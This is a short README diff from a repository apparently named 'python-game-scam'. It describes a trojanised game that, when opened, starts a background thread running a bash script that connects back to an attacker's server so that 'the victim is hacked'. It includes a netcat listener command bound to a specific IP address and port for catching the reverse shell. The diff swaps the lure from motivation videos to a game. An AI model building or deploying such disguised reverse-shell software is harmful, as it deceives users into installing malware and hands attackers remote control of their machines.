hirwablessing/python-game-scam/README.md

    $ nc -lnvp 2004 -s 82.165.97.169
 ```

-The victim downloads the motivation videos expecting to watch all the motivation videos.
+The victim thinks that he/she is just playing a game.

 When the victim opens up the game, a thread is created the in the background to run a bash script that connects to the server hence the victim is hacked.